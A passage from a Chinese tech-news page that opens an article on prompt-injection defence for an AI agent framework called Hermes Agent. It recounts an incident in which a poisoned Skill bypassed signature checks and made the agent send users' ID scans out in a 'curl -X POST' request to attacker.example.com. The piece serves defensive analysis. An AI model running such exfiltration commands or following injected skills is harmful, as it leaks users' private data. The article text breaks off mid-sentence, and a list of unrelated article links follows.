当前位置: 首页 > news >正文

Prompt 注入攻防实战:Hermes Agent 的 4 类恶意 Skill 识别与自动查杀方案

1. 这不是“AI被忽悠了”,是 Hermes Agent 的 Skill 注入链被攻破了

上周三下午,我们线上灰度环境里一个负责 PDF 证卡拼版的 Hermes Agent 突然开始批量生成带 base64 编码的恶意 payload 文件——它把用户上传的身份证扫描件,悄悄混进了伪造的curl -X POST https://attacker.example.com/leak请求体里。更诡异的是,日志里找不到任何人工触发记录,所有调用都来自一个叫pdf-layout-enhancer的 Skill,版本号显示为v0.2.1,而我们仓库里这个 Skill 的最新稳定版明明是v0.1.9

我立刻拉出hermes agent logs --since 24h | grep "skill-exec",发现它在执行前根本没走soul.md的签名校验流程;再查hermes agent list-skills,输出里赫然多出两个未注册的 Skill:pdf-layout-enhancer@maliciousglm4.7flash-bridge。它们没有出现在skills/目录下,却能被hermes agent run正常加载——说明注入点不在文件系统层,而在运行时解析环节。

这不是 Prompt 注入的“玩具级”演示,而是真实发生在生产环境里的 Skill 投毒事件。Hermes Agent 的设计哲学是“S

http://www.jsqmd.com/news/847703/

相关文章:

  • Vue3企业级后台管理系统解决方案:V3 Admin Vite 5.0架构设计与实战指南
  • Windows 11终极优化指南:使用Win11Debloat轻松提升系统性能
  • 2026年重磅上新:优质的中式铝木门窗厂家 - 品牌推广大师
  • windoes terminal终端右键菜单快捷配置
  • STM32单片机串口通信避坑指南:从CubeMX配置到中断回调函数编写
  • 发文首选!机器学习锂离子电池!
  • 赋能客户录音转待办精准识别快速整理,省心清晰更高效
  • Perplexity搜索结果泛化严重?紧急启用「设计意图锁定协议」——20年UX架构师压箱底的5行元提示词
  • 【从零开始学习JAVA | 第四篇】继承与多态
  • NotebookLM文化遗产研究落地全链路(从敦煌写本到AI知识库的9步工业化流程)
  • 5分钟掌握抖音无水印批量下载:免费工具完整使用指南
  • 实时AI推理优化:如何提升模型响应速度
  • 统信UOS 20专业版图形化配置代理保姆级教程,内网访问外网就这么简单
  • 银河麒麟V10SP3-arm版本安装oracle19C数据库
  • 通过taotoken cli在ubuntu上一键配置多个开发工具环境
  • Whisky终极指南:在macOS上免费运行Windows程序的完整解决方案
  • Qt 动画进阶:手把手教你用 QCharts 可视化调试 QEasingCurve 曲线
  • Linux 网络内核参数调优完全指南
  • vert-harmonium
  • Windows右键菜单终极清理指南:5分钟快速整理你的右键菜单
  • 如何利用QuPath实现专业级数字病理分析:从入门到精通的完整指南
  • 庆阳足金回收银手镯回收PT990铂金回收钻石戒指回收旧首饰回收高价多少钱一克同城价格查询上门上门估价闲置变现转让靠谱权威排行榜 - 检测回收中心
  • Python新手避坑:明明pip install了python-dotenv,为啥还是报错找不到模块?
  • 南宁投资金条回收上门回收白银上门铂金回收旧钻石回收周边金银回收本地排名正规门店专业推荐哪家靠谱二手哪家强 - 检测回收中心
  • 别再只改属性个数了!深入PHP GC机制,用fast-destruct和变量引用优雅绕过__wakeup
  • 广州小程序定制开发公司排行 性价比维度实测对比 - 奔跑123
  • 如何通过cursor-free-vip工具扩展Cursor AI编辑器功能:完整指南与实用技巧
  • 如何从丢失的Android手机中恢复联系人
  • UBX-M9140-KB-C1100A米级定位精度,支持四星座 GNSS‌,
  • API 密钥泄露频发?OpenClaw 在企业安全治理中实现密钥轮换自动化(3 步配置)